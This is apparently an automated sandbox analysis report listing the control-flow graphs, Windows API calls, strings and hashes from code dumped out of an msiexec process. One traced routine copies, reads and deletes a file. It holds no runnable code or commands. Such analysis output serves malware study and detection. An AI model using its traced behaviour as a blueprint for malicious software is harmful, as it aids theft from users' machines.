                                                    • Instruction Fuzzy Hash: 3361F473D0032DAAEF659BA4CC40BDEB7B9AF19200F0440D6D206A7694DBB47AC7CB55

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                    • API String ID: 4218353326-230879103
                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                    • Instruction ID: 8cc49d9db0baacda8d19ee830b6209777c40ee402faacc5ae87863098b95259f
                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                    • Instruction Fuzzy Hash: 5671E577D0032D5BDB259BA49C84ADE7BFC9B19200F1440D6D644D7241EAB4BBC6CBA0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 203 232d7cc2-232d7cd6 204 232d7cd8-232d7cdd 203->204 205 232d7d44-232d7d4c 203->205 204->205 206 232d7cdf-232d7ce4 204->206 207 232d7d4e-232d7d51 205->207 208 232d7d93-232d7dab call 232d7e35 205->208 206->205 209 232d7ce6-232d7ce9 206->209 207->208 211 232d7d53-232d7d90 call 232d571e * 4 207->211 217 232d7dae-232d7db5 208->217 209->205 212 232d7ceb-232d7cf3 209->212 211->208 215 232d7d0d-232d7d15 212->215 216 232d7cf5-232d7cf8 212->216 222 232d7d2f-232d7d43 call 232d571e * 2 215->222 223 232d7d17-232d7d1a 215->223 216->215 219 232d7cfa-232d7d0c call 232d571e call 232d90ba 216->219 220 232d7dd4-232d7dd8 217->220 221 232d7db7-232d7dbb 217->221 219->215 231 232d7dda-232d7ddf 220->231 232 232d7df0-232d7dfc 220->232 227 232d7dbd-232d7dc0 221->227 228 232d7dd1 221->228 222->205 223->222 229 232d7d1c-232d7d2e call 232d571e call 232d91b8 223->229 227->228 238 232d7dc2-232d7dd0 call 232d571e * 2 227->238 228->220 229->222 233 232d7ded 231->233 234 232d7de1-232d7de4 231->234 232->217 236 232d7dfe-232d7e0b call 232d571e 232->236 233->232 234->233 241 232d7de6-232d7dec call 232d571e 234->241 238->228 241->233
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 232D7D06
                                                      • Part of subcall function 232D90BA: _free.LIBCMT ref: 232D90D7
                                                      • Part of subcall function 232D90BA: _free.LIBCMT ref: 232D90E9
                                                      • Part of subcall function 232D90BA: _free.LIBCMT ref: 232D90FB
                                                      • Part of subcall function 232D90BA: _free.LIBCMT ref: 232D910D
                                                      • Part of subcall function 232D90BA: _free.LIBCMT ref: 232D911F
                                                      • Part of subcall function 232D90BA: _free.LIBCMT ref: 232D9131
                                                      • Part of subcall function 232D90BA: _free.LIBCMT ref: 232D9143
                                                      • Part of subcall function 232D90BA: _free.LIBCMT ref: 232D9155
                                                      • Part of subcall function 232D90BA: _free.LIBCMT ref: 232D9167
                                                      • Part of subcall function 232D90BA: _free.LIBCMT ref: 232D9179
                                                      • Part of subcall function 232D90BA: _free.LIBCMT ref: 232D918B
                                                      • Part of subcall function 232D90BA: _free.LIBCMT ref: 232D919D
                                                      • Part of subcall function 232D90BA: _free.LIBCMT ref: 232D91AF
                                                    • _free.LIBCMT ref: 232D7CFB
                                                      • Part of subcall function 232D571E: HeapFree.KERNEL32(00000000,00000000,?,232D924F,?,00000000,?,00000000,?,232D9276,?,?,?,?,232D7E5A,?), ref: 232D5734
                                                      • Part of subcall function 232D571E: GetLastError.KERNEL32(?,?,232D924F,?,00000000,?,00000000,?,232D9276,?,?,?,?,232D7E5A,?,?), ref: 232D5746
                                                    • _free.LIBCMT ref: 232D7D1D
                                                    • _free.LIBCMT ref: 232D7D32
                                                    • _free.LIBCMT ref: 232D7D3D
                                                    • _free.LIBCMT ref: 232D7D5F
                                                    • _free.LIBCMT ref: 232D7D72
                                                    • _free.LIBCMT ref: 232D7D80
                                                    • _free.LIBCMT ref: 232D7D8B
                                                    • _free.LIBCMT ref: 232D7DC3
                                                    • _free.LIBCMT ref: 232D7DCA
                                                    • _free.LIBCMT ref: 232D7DE7
                                                    • _free.LIBCMT ref: 232D7DFF
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: b9f4eef952490ffd277b94a42eea327fc265992d14d2f9bc7078d57cb5f76674
                                                    • Instruction ID: 476dd5fb03565792f8376c13d7467d34c54222172dd6d40c1f66388ff5352f7a
                                                    • Opcode Fuzzy Hash: b9f4eef952490ffd277b94a42eea327fc265992d14d2f9bc7078d57cb5f76674
                                                    • Instruction Fuzzy Hash: FA31193360030EDFEB21AE38DD40B6AB7E9AF10214F2454A9E959D7159DBB9B9C0CB14

                                                    Control-flow Graph

                                                    APIs
                                                    • _free.LIBCMT ref: 232D59EA
                                                      • Part of subcall function 232D571E: HeapFree.KERNEL32(00000000,00000000,?,232D924F,?,00000000,?,00000000,?,232D9276,?,?,?,?,232D7E5A,?), ref: 232D5734
                                                      • Part of subcall function 232D571E: GetLastError.KERNEL32(?,?,232D924F,?,00000000,?,00000000,?,232D9276,?,?,?,?,232D7E5A,?,?), ref: 232D5746
                                                    • _free.LIBCMT ref: 232D59F6
                                                    • _free.LIBCMT ref: 232D5A01
                                                    • _free.LIBCMT ref: 232D5A0C
                                                    • _free.LIBCMT ref: 232D5A17
                                                    • _free.LIBCMT ref: 232D5A22
                                                    • _free.LIBCMT ref: 232D5A2D
                                                    • _free.LIBCMT ref: 232D5A38
                                                    • _free.LIBCMT ref: 232D5A43
                                                    • _free.LIBCMT ref: 232D5A51
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 1f4f42af8ac3ada2401c0b960047d6da3eeb7e9359e4d545592d23bdbc667feb
                                                    • Instruction ID: 7e70392754562b96f82c1c6fcfc008f2efe86f88da5ae71c4afd0184259bb4a8
                                                    • Opcode Fuzzy Hash: 1f4f42af8ac3ada2401c0b960047d6da3eeb7e9359e4d545592d23bdbc667feb
                                                    • Instruction Fuzzy Hash: E411747A52024CEFDB21DF54DC41CDD3FA9EF14250F6551E5BA088B229DBB2EA909B80

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 287 232daa53-232daa6e 288 232daa80 287->288 289 232daa70-232daa7e RtlDecodePointer 287->289 290 232daa85-232daa8b 288->290 289->290 291 232daa91 290->291 292 232dabb2-232dabb5 290->292 293 232daa97-232daa9a 291->293 294 232daba6 291->294 295 232dabb7-232dabba 292->295 296 232dac12 292->296 298 232dab47-232dab4a 293->298 299 232daaa0 293->299 297 232daba8-232dabad 294->297 301 232dabbc-232dabbf 295->301 302 232dac06 295->302 300 232dac19 296->300 303 232dac5b-232dac6a call 232d2ada 297->303 309 232dab9d-232daba4 298->309 310 232dab4c-232dab4f 298->310 304 232dab34-232dab42 299->304 305 232daaa6-232daaab 299->305 306 232dac20-232dac49 300->306 307 232dabfa 301->307 308 232dabc1-232dabc4 301->308 302->296 304->306 312 232daaad-232daab0 305->312 313 232dab25-232dab2f 305->313 334 232dac4b-232dac50 call 232d6368 306->334 335 232dac56-232dac59 306->335 307->302 314 232dabee 308->314 315 232dabc6-232dabc9 308->315 311 232dab61-232dab8f 309->311 316 232dab94-232dab9b 310->316 317 232dab51-232dab54 310->317 311->335 320 232dab1c-232dab23 312->320 321 232daab2-232daab5 312->321 313->306 314->307 323 232dabcb-232dabd0 315->323 324 232dabe2 315->324 316->300 317->303 325 232dab5a 317->325 326 232daac7-232daaf7 320->326 327 232dab0d-232dab17 321->327 328 232daab7-232daaba 321->328 329 232dabdb-232dabe0 323->329 330 232dabd2-232dabd5 323->330 324->314 325->311 326->335 341 232daafd-232dab08 call 232d6368 326->341 327->306 328->303 332 232daac0 328->332 329->297 330->303 330->329 332->326 334->335 335->303 341->335
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: DecodePointer
                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                    • API String ID: 3527080286-3064271455
                                                    • Opcode ID: 53c0595e5c0730713e32fe8c538039b9c0c57231c94062d145d0310a3b38556d
                                                    • Instruction ID: 446a2267870ffc2069910c9fe55d5117a38e311b8f8cb24d3cf23699c6d3ce64
                                                    • Opcode Fuzzy Hash: 53c0595e5c0730713e32fe8c538039b9c0c57231c94062d145d0310a3b38556d
                                                    • Instruction Fuzzy Hash: CD51AE7691060ECBCF04AFA8DD88D9CBFB4FF19310F5482D5D581AB254CB35AAA5CB18

                                                    Control-flow Graph

                                                    APIs
                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 232D1D1B
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 232D1D37
                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 232D1D4B
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 232D1D58
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 232D1D72
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 232D1D7D
                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 232D1D8A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                    • String ID:
                                                    • API String ID: 1454806937-0
                                                    • Opcode ID: 327f2b6565707f658c39f143832f774659e37027e7d79bf6e8a5e9bb848205c1
                                                    • Instruction ID: 06bfa69f548d3fd29fcdbbeaee9573485883601107a3eb8b84f96e241a6645c4
                                                    • Opcode Fuzzy Hash: 327f2b6565707f658c39f143832f774659e37027e7d79bf6e8a5e9bb848205c1
                                                    • Instruction Fuzzy Hash: EF214F72D4122CAFD710ABA09C8CFEA7ABCEF59345F0445A6F515D2140D674AE868A70

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 361 232d9492-232d94ef GetConsoleCP 362 232d94f5-232d9511 361->362 363 232d9632-232d9644 call 232d2ada 361->363 365 232d952c-232d953d call 232d7c19 362->365 366 232d9513-232d952a 362->366 373 232d953f-232d9542 365->373 374 232d9563-232d9565 365->374 368 232d9566-232d9575 call 232d79e6 366->368 368->363 375 232d957b-232d959b WideCharToMultiByte 368->375 376 232d9609-232d9628 373->376 377 232d9548-232d955a call 232d79e6 373->377 374->368 375->363 378 232d95a1-232d95b7 WriteFile 375->378 376->363 377->363 383 232d9560-232d9561 377->383 381 232d95b9-232d95ca 378->381 382 232d962a-232d9630 GetLastError 378->382 381->363 384 232d95cc-232d95d0 381->384 382->363 383->375 385 232d95fe-232d9601 384->385 386 232d95d2-232d95f0 WriteFile 384->386 385->362 388 232d9607 385->388 386->382 387 232d95f2-232d95f6 386->387 387->363 389 232d95f8-232d95fb 387->389 388->363 389->385
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,232D9C07,?,00000000,?,00000000,00000000), ref: 232D94D4
                                                    • __fassign.LIBCMT ref: 232D954F
                                                    • __fassign.LIBCMT ref: 232D956A
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 232D9590
                                                    • WriteFile.KERNEL32(?,?,00000000,232D9C07,00000000,?,?,?,?,?,?,?,?,?,232D9C07,?), ref: 232D95AF
                                                    • WriteFile.KERNEL32(?,?,?,232D9C07,00000000,?,?,?,?,?,?,?,?,?,232D9C07,?), ref: 232D95E8
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID:
                                                    • API String ID: 1324828854-0
                                                    • Opcode ID: f09b0fcbdd62fe3d61347476851338ed3a49e8574c87720f0f6821d0f24b001e
                                                    • Instruction ID: 66c37545135060453b1fd111a829484da42f595773ee29e7ba0d05dce5a4c8b5
                                                    • Opcode Fuzzy Hash: f09b0fcbdd62fe3d61347476851338ed3a49e8574c87720f0f6821d0f24b001e
                                                    • Instruction Fuzzy Hash: F5519372D00249AFDB10DFA8CC95AEEBBF8EF19310F14815AF555F7285D670A981CBA0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 390 232d3370-232d33b5 call 232d3330 call 232d37a7 395 232d33b7-232d33c9 390->395 396 232d3416-232d3419 390->396 397 232d3439-232d3442 395->397 399 232d33cb 395->399 396->397 398 232d341b-232d3428 call 232d3790 396->398 402 232d342d-232d3436 call 232d3330 398->402 401 232d33d0-232d33e7 399->401 403 232d33fd 401->403 404 232d33e9-232d33f7 call 232d3740 401->404 402->397 407 232d3400-232d3405 403->407 411 232d340d-232d3414 404->411 412 232d33f9 404->412 407->401 410 232d3407-232d3409 407->410 410->397 413 232d340b 410->413 411->402 414 232d33fb 412->414 415 232d3443-232d344c 412->415 413->402 414->407 416 232d344e-232d3455 415->416 417 232d3486-232d3496 call 232d3774 415->417 416->417 419 232d3457-232d3466 call 232dbbe0 416->419 422 232d3498-232d34a7 call 232d3790 417->422 423 232d34aa-232d34c6 call 232d3330 call 232d3758 417->423 427 232d3468-232d3480 419->427 428 232d3483 419->428 422->423 427->428 428->417
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 232D339B
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 232D33A3
                                                    • _ValidateLocalCookies.LIBCMT ref: 232D3431
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 232D345C
                                                    • _ValidateLocalCookies.LIBCMT ref: 232D34B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 1170836740-1018135373
                                                    • Opcode ID: 431f3b0ffaf82cf1db67f5ef45edb0d73054a8df347e071b1c2e563a2ec28695
                                                    • Instruction ID: d9310768d236b5b2bb25e800b11f613108bfc91f8392f0762891fe61b6009b73
                                                    • Opcode Fuzzy Hash: 431f3b0ffaf82cf1db67f5ef45edb0d73054a8df347e071b1c2e563a2ec28695
                                                    • Instruction Fuzzy Hash: E241D236E0020D9BCB10DF68CE84A9EBBB5AF45324F18C1D5EB149B251D779EA91CB90

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 232D9221: _free.LIBCMT ref: 232D924A
                                                    • _free.LIBCMT ref: 232D92AB
                                                      • Part of subcall function 232D571E: HeapFree.KERNEL32(00000000,00000000,?,232D924F,?,00000000,?,00000000,?,232D9276,?,?,?,?,232D7E5A,?), ref: 232D5734
                                                      • Part of subcall function 232D571E: GetLastError.KERNEL32(?,?,232D924F,?,00000000,?,00000000,?,232D9276,?,?,?,?,232D7E5A,?,?), ref: 232D5746
                                                    • _free.LIBCMT ref: 232D92B6
                                                    • _free.LIBCMT ref: 232D92C1
                                                    • _free.LIBCMT ref: 232D9315
                                                    • _free.LIBCMT ref: 232D9320
                                                    • _free.LIBCMT ref: 232D932B
                                                    • _free.LIBCMT ref: 232D9336
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                    • Instruction ID: 809740157fc99d15940c027a6406f8c93eabd65d8a7eb934430b69e5e29a1761
                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                    • Instruction Fuzzy Hash: E1118133540B0CFAE670ABB0DC4AFCB7BAD9F14700F508864B69976056DBF4B5844751

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 472 232d5351-232d535e 473 232d537b-232d53c7 call 232d571e * 4 472->473 474 232d5360-232d536c 472->474 474->473 475 232d536e-232d5375 call 232d571e 474->475 475->473
                                                    APIs
                                                    • _free.LIBCMT ref: 232D536F
                                                      • Part of subcall function 232D571E: HeapFree.KERNEL32(00000000,00000000,?,232D924F,?,00000000,?,00000000,?,232D9276,?,?,?,?,232D7E5A,?), ref: 232D5734
                                                      • Part of subcall function 232D571E: GetLastError.KERNEL32(?,?,232D924F,?,00000000,?,00000000,?,232D9276,?,?,?,?,232D7E5A,?,?), ref: 232D5746
                                                    • _free.LIBCMT ref: 232D5381
                                                    • _free.LIBCMT ref: 232D5394
                                                    • _free.LIBCMT ref: 232D53A5
                                                    • _free.LIBCMT ref: 232D53B6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID: x}
                                                    • API String ID: 776569668-1523930674
                                                    • Opcode ID: f1f6aecd9d2c13c50777859881f093c5aef428b18202c045426c004fe99c7564
                                                    • Instruction ID: 2a915497c700bb8db11d6a2faf81395d6f237d71789300f07bec5bd4ac5d4f31
                                                    • Opcode Fuzzy Hash: f1f6aecd9d2c13c50777859881f093c5aef428b18202c045426c004fe99c7564
                                                    • Instruction Fuzzy Hash: B1F0B476C10318DBCA127F298E9B8083BB8B73CA1133581CAF91087314D7F8B8818B80

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 486 232d8821-232d883a 487 232d883c-232d884c call 232d9341 486->487 488 232d8850-232d8855 486->488 487->488 495 232d884e 487->495 489 232d8857-232d885f 488->489 490 232d8862-232d8886 MultiByteToWideChar 488->490 489->490 492 232d888c-232d8898 490->492 493 232d8a19-232d8a2c call 232d2ada 490->493 496 232d88ec 492->496 497 232d889a-232d88ab 492->497 495->488 499 232d88ee-232d88f0 496->499 500 232d88ad-232d88bc call 232dbf20 497->500 501 232d88ca-232d88db call 232d56d0 497->501 503 232d8a0e 499->503 504 232d88f6-232d8909 MultiByteToWideChar 499->504 500->503 513 232d88c2-232d88c8 500->513 501->503 514 232d88e1 501->514 508 232d8a10-232d8a17 call 232d8801 503->508 504->503 507 232d890f-232d892a call 232d5f19 504->507 507->503 518 232d8930-232d8937 507->518 508->493 517 232d88e7-232d88ea 513->517 514->517 517->499 519 232d8939-232d893e 518->519 520 232d8971-232d897d 518->520 519->508 521 232d8944-232d8946 519->521 522 232d897f-232d8990 520->522 523 232d89c9 520->523 521->503 524 232d894c-232d8966 call 232d5f19 521->524 526 232d89ab-232d89bc call 232d56d0 522->526 527 232d8992-232d89a1 call 232dbf20 522->527 525 232d89cb-232d89cd 523->525 524->508 541 232d896c 524->541 530 232d89cf-232d89e8 call 232d5f19 525->530 531 232d8a07-232d8a0d call 232d8801 525->531 526->531 540 232d89be 526->540 527->531 539 232d89a3-232d89a9 527->539 530->531 544 232d89ea-232d89f1 530->544 531->503 543 232d89c4-232d89c7 539->543 540->543 541->503 543->525 545 232d8a2d-232d8a33 544->545 546 232d89f3-232d89f4 544->546 547 232d89f5-232d8a05 WideCharToMultiByte 545->547 546->547 547->531 548 232d8a35-232d8a3c call 232d8801 547->548 548->508
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,232D6FFD,00000000,?,?,?,232D8A72,?,?,00000100), ref: 232D887B
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,232D8A72,?,?,00000100,5EFC4D8B,?,?), ref: 232D8901
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 232D89FB
                                                    • __freea.LIBCMT ref: 232D8A08
                                                      • Part of subcall function 232D56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 232D5702
                                                    • __freea.LIBCMT ref: 232D8A11
                                                    • __freea.LIBCMT ref: 232D8A36
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1414292761-0
                                                    • Opcode ID: bb2a553404de53e0da0f412d9b502c658effab2ecae2717917f06366a3d8a443
                                                    • Instruction ID: 1307b5e62fccd67e85e6f2291bf4f7664769480554e47ecf107c1d8db81a507f
                                                    • Opcode Fuzzy Hash: bb2a553404de53e0da0f412d9b502c658effab2ecae2717917f06366a3d8a443
                                                    • Instruction Fuzzy Hash: B651F37361021FAFDB259E60DC40EAB37A9EF54A50F2546A9FD04DA144EB74ECD0C6A0

                                                    Control-flow Graph

                                                    APIs
                                                    • _strlen.LIBCMT ref: 232D1607
                                                    • _strcat.LIBCMT ref: 232D161D
                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,232D190E,?,?,00000000,?,00000000), ref: 232D1643
                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,232D190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 232D165A
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,232D190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 232D1661
                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,232D190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 232D1686
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                    • String ID:
                                                    • API String ID: 1922816806-0
                                                    • Opcode ID: fa426f1c79781b74a52ead074ab9209caa674d54709a6e93b57937476050ee90
                                                    • Instruction ID: 41c7610033e08fd52b40f9525026aa7d2a4f2817c0cbe288d455a0f73ed14534
                                                    • Opcode Fuzzy Hash: fa426f1c79781b74a52ead074ab9209caa674d54709a6e93b57937476050ee90
                                                    • Instruction Fuzzy Hash: 5421B637A00318ABC7149B54DC85AEE77B8EF99711F24805BE504AB141EF74B58287A5
                                                    APIs
                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 232D1038
                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 232D104B
                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 232D1061
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 232D1075
                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 232D1090
                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 232D10B8
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                    • String ID:
                                                    • API String ID: 3594823470-0
                                                    • Opcode ID: 2a4312c5008ca7684108d9e48464fbe15124c0ee423f30d6bb9b5368c6026152
                                                    • Instruction ID: 7a1f93a39e84453d169a694cd814b1ccb376d8db4c90699c44a6c5c9b85458b6
                                                    • Opcode Fuzzy Hash: 2a4312c5008ca7684108d9e48464fbe15124c0ee423f30d6bb9b5368c6026152
                                                    • Instruction Fuzzy Hash: EE21833690032D9BCF60EB61EC48DDB376CEF88315F104196E955975A1DA70AAD6CB80
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,232D3518,232D23F1,232D1F17), ref: 232D3864
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 232D3872
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 232D388B
                                                    • SetLastError.KERNEL32(00000000,?,232D3518,232D23F1,232D1F17), ref: 232D38DD
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
